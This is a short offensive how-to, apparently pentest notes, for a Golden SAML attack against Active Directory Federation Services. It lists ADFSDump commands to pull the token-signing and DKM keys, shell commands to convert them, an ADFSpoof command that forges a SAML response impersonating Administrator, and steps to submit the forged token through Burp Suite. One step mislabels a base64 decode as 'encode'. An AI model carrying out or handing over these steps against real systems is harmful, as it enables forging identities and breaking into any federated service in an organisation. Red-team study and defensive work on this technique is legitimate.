Golden SAML attack

Tools: ADFSDump, ADFSpoof, ADFSDump-PS

With this attack, we forge a SAML token that we can use to authenticate to ANY service we want impersonating ANY user within the corporate environment.

To perform this attack, we’ll need the private key that signs the SAML objects (similarly to the need for the KRBTGT in a golden ticket). For this private key, we don’t need a domain admin access, we only need the AD FS user account.

For a Golden SAML attack, we need to first compromise the AD FS service account, Then we can use tools such as ADFSDump to extract the required information:

1. The token signing certificate and its private key

2. The Distributed Key Manager (DKM) key from Active Directory

3. The list of services for which the AD FS server is configured to be an identity provider

Commands:

1) Extract the Distribution Key Manager (DKM) Private Key and the Encrypted Token Signing Key (TKS) as well as the Issuer Identifier and the Relting Party Trust Information as well

.\ADFSDump.exe 

2) Encode the TKS Key in Base64 format

cat TKSKey.txt | base64 -d > TKSKey.bin 

3) Convert the DKM Key in Hex format

cat DKMKey.txt | tr -d "-" | xxd -r -p > DKMKey.bin 

python3 ADFSpoof.py -b TKSKey.bin DKMKey.bin -s 'ADFS_SERVER' saml2 --endpoint 'https://saml2response.domain.local/adfs/saml/ENDPOINT_URL_FOR_SAML_RESPONSE' --nameidformat 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress' --nameid 'Administrator@DOMAIN.LOCAL' --rpidentifier 'https://saml2response.domain.local/RELYING_PARTY_IDENTIFIER_ENDPOINT' --assertions 'SAML assertions to be included in the SAML response.'

TIP: Refer the format in the tool documentation

Then browse to:

• https://saml2response.domain.local/adfs/saml/ENDPOINT_URL_FOR_SAML_RESPONSE

And capture the POST request in Burpsuite.

Then token should be included in the body of the request on a form data field typically named:

• SAMLResponse=INSERT_GOLDEN_SAML_TOKEN_HERE

Then set the header:

• Content-Type: application/x-www-form-urlencoded

AND WE ARE IN!!!